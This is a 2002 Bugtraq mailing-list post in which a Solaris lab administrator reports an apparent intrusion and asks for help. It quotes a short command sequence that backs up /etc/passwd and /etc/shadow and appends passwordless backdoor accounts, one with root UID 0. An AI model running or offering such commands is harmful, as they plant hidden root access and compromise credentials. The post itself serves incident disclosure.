[26702] in bugtraq
Subtle insinuations may be more than idle threats I'm afraid.
daemon@ATHENA.MIT.EDU (security@australia.edu)
Fri Aug 16 16:52:01 2002
From: security@australia.edu
Reply-To: security@australia.edu
To: bugtraq@securityfocus.com
Date: Thu, 15 Aug 2002 15:35:12 -0800
Message-id: <3d5d0d41.2ab8.0@australia.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
memetic-engineer@hushmail.com wrote:
http://lists.netsys.com/pipermail/full-disclosure/2002-August/001073.html
"#old solaris bug die hard.....something similar, but not quite. Have you audited
your Solstice
#products recently? lit_tty was nothing.
M^ got lost again
( agent.lspitzner.added.to.meme156)
cp /etc/passwd /etc/.tp;"
I assumed he was speaking of a variation of this old thing;
> # cp /etc/passwd /etc/.tp;
^Mcp /etc/shadow /etc/.ts;
echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
echo "r::10891::::::" >> /etc/shadow;
echo "re::6445::::::" >> /etc/shadow;
: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# who;
rsides console WED Aug 15 2002 21:09
^M: not found
# exit;
and after converting the hex saw that it was an exact replica.
To make a long story short, I woke up yesterday to find this in my home
directory :
./MeMe156/agent.agency.08.14.02.2348/added .agent.sol
after looking through ;
/var/adm/messages
/var/adm/syslog
to no avail, I used what I thought to be a clever script that logs
auth.notice messages. NOTHING
/var/log/utmp; /var/log/utmpx
/var/log/wtmp; /var/log/wtmpx
/var/log/syslog
nothing. But then /var/log/sulog showed me this;
SU 03/31 12:52 + pts/0 <userid>-root
and /var/adm/messages revealed this
Mar 31 12:48:41 ***.***.***.*** unix: rebooting...
almost convenient that it was there at all. If anyone else has any
information remotely related please respond.
I administer a private lab running 2 Sun LX50's involved in active Ionospheric
research and HF analysis.
"In building a machine we are so intent upon our purpose that we forget that
we are investing that machine with creative power...it can overgrow us in an
invisible way...they are the dwelling-places of divine powers that may destroy
us."
-C.G. Jung
This message was sent from http://australia.edu
Check out the new international site at http://australia.edu/international
